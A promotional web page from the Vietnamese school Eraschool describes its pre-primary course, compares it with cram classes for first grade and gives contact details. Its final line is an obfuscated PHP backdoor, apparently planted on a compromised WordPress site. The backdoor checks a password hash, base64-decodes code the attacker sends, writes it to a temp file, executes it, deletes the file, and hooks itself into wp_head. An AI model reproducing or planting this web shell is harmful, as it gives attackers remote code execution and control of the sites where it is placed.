Eraschool dạy khóa học tiền tiểu học như thế nào?

post

Nhiều phụ huynh nghĩ rằng học tiền tiểu học cũng “học trước” kiến thức như một lò luyện thi, để khi vào học thật con bắt nhịp nhanh hơn. Liệu đây có phải là cách hiểu đúng? Và khóa học tiền tiểu học của Eraschool khác gì so với những “lò luyện” khác, mời phụ huynh cùng tham khảo bài viết này! 

So sánh khóa tiền tiểu học và lò luyện lớp 1

Đừng để con bị nhồi nhét kiến thức ở lò luyện thi lớp 1
Đừng để con bị nhồi nhét kiến thức ở lò luyện thi lớp 1

Tùy theo mục đích học tập và nhu cầu của phụ huynh, chương trình của khóa học tiền tiểu học khác nhau. Dưới đây là bảng so sánh giữa lớp tiền tiểu học của Eraschool và các lò ôn luyện trước khi vào lớp 1: 

Eraschool Lò luyện thi lớp 1
Môi trường Linh hoạt giữa học ngoài thiên nhiên trong lành và trong lớp học hiện đại, sạch sẽ Học trong lớp học đông đúc, chật chội
Thời gian  Linh hoạt theo nhu cầu của phụ huynh Tùy khóa học, kéo dài từ 2 – 8 tuần 
Giáo trình Có giáo trình thiết kế riêng cho khóa học tiền tiểu học theo các triết lý giáo dục của trường. Thường không có giáo trình cụ thể, mà tập trung vào việc học đọc, học viết
Mục đích – Chú trọng về trải nghiệm sống

Học nếp sinh hoạt của lớp 1

– Học cách sống và gần gũi với thiên nhiên

– Học các kỹ năng cơ bản để tự phục vụ bản thân

– Học cách hòa nhập và giải quyết các mâu thuẫn trong cộng đồng.

Học trước kiến thức các môn học chính của lớp 1
   Khóa tiền tiểu học là tiền đề để bé bước vào lớp 1 tự tin hơn

Khóa tiền tiểu học là tiền đề để bé bước vào lớp 1 tự tin hơn

Chi tiết khóa tiền tiểu học của Eraschool

Để giúp con mau chóng hoà nhập được với môi trường mới, các bài học của khóa học tiền tiểu học được thiết kế như sau:

  • Học xen kẽ các môn học giữa thiên nhiên và trong lớp học 
  • Có nhiều trải nghiệm cuộc sống hơn là kiến thức lớp 1. Ví dụ, ở đây các bé được tự tay trồng cây, bắt cá hay được chỉ dạy cách quý trọng thực phẩm mình được ăn hằng ngày…. 
  • Hình thành và phát triển kỹ năng cá nhân, kỹ năng làm việc nhóm và kỹ năng thích nghi ở môi trường mới 
  • Phát triển ngôn ngữ: bắt đầu làm quen với tiếng Việt bằng cách “chơi đùa” cùng các chữ cái để bé không áp lực. 
  • Hình thành và phát triển tư duy, năng lực tính toán để giải quyết vấn đề thông qua môn học. 
  • Xây dựng nền tảng tiếng Anh căn bản cho bé giúp con sẵn sàng học các chương trình học tăng cường tiếng Anh hoặc học hệ chương trình Cambridge
  • Thực hiện 2 dự án STEAM đặc sắc để bé phát triển kỹ năng giao tiếp, óc sáng tạo, tư duy phản biện và kỹ năng hợp tác. 

Nếu phụ huynh còn thắc mắc tiền tiểu học học những gì thì hãy gọi tới hotline 0899 889 818 để được tư vấn chi tiết hơn. Đường dây nóng luôn hỗ trợ 24/7. 

Vài nét về Eraschool

Eraschool cho các bé môi trường phát triển toàn diện
Eraschool cho các bé môi trường phát triển toàn diện

 

Eraschool là trường học sinh thái liên cấp nằm trong Hệ thống giáo dục sinh thái Erahouse – hệ thống các mô hình trải nghiệm thực tế gắn liền với giáo dục sáng tạo cho học sinh các cấp từ tiền tiểu học đến THCS. Triết lý giáo dục của nhà trường cũng chú trọng việc học sinh được tự học – tự giáo dục – tự làm ra chính mình. Ngôi trường nằm giữa thiên nhiên rộng 20.000m2 này là tất cả những gì phụ huynh cần để con được phát triển toàn diện cả trí tuệ, thế chất lẫn tâm hồn. Với những gì mà Eraschool có, đây chính là môi trường để các con hình thành và phát triển khả năng tự làm chủ chính mình và cuộc sống của chính mình. 

Hy vọng với những thông tin được chia sẻ ở trên đã giúp phụ huynh hiểu hơn về khóa học tiền tiểu học ở Eraschool. Ba mẹ hãy cứ yên tâm gửi gắm các con ở Eraschool, chúng tôi sẽ luôn cố gắng hết sức vì để những năm học phổ thông của các con vui vẻ và có nhiều trải nghiệm bổ ích nhất.

Đông Cao, Tráng Việt, Mê Linh, Hà Nội

tuyensinh1@eraschool.edu.vn

0899 889 818

eraschool.edu.vn

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}